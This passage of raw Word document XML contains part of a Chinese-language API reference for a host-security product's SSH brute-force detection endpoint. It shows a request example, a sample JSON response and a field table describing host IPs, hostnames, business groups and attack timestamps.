      <w:tr w:rsidR="00BC669E" w14:paraId="590B4A0B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EE6A22F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E8AB94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>解封失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21247CD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4F1DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brutecrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50&amp;group=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F4488" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37051DC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "979f3c4d44b2e765",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 37,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tianxianhu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "tFU7aUo3o5w7GDPlJqQfMA==",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serviceType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1523412532,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clientIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "106.75.67.64",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "block": -1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serverName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A54253F"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452"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1EC2B55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925C670" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="693AADBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B286A48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2882033B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B46A67B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EB2B7D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1942D380" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33B891AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB9217D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>记录ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1472EAFF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="206D9002" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="263A4F9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="260CAD99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F6C9A93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="178FE6BF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17ADFA34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08644DE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B0D1C17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10FB664A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07A50038" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0693FA44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75F4C41D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A147C54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EF27CA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32251DC0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="600606E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62430230" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FB7CF78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="099EF4E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2CB822C6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F32990" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8E58D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F34702" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F81130" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29D93097" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F1AD295" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="330D7100" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25B4E2CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="276D5EC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A34FC32" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C29CADA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A57D74D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56EB7119" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215EBAE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="372F278B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DBBE08E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BA291FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06C747B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26160E4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6689834C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270CC03C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F37953D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02651E07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C3DB65A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A840E0E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="447EDB0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51A60611" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6943A88B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A5CBB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="53EFA2AA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="671C173C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB44512" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCA8913" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF966F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>攻击时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
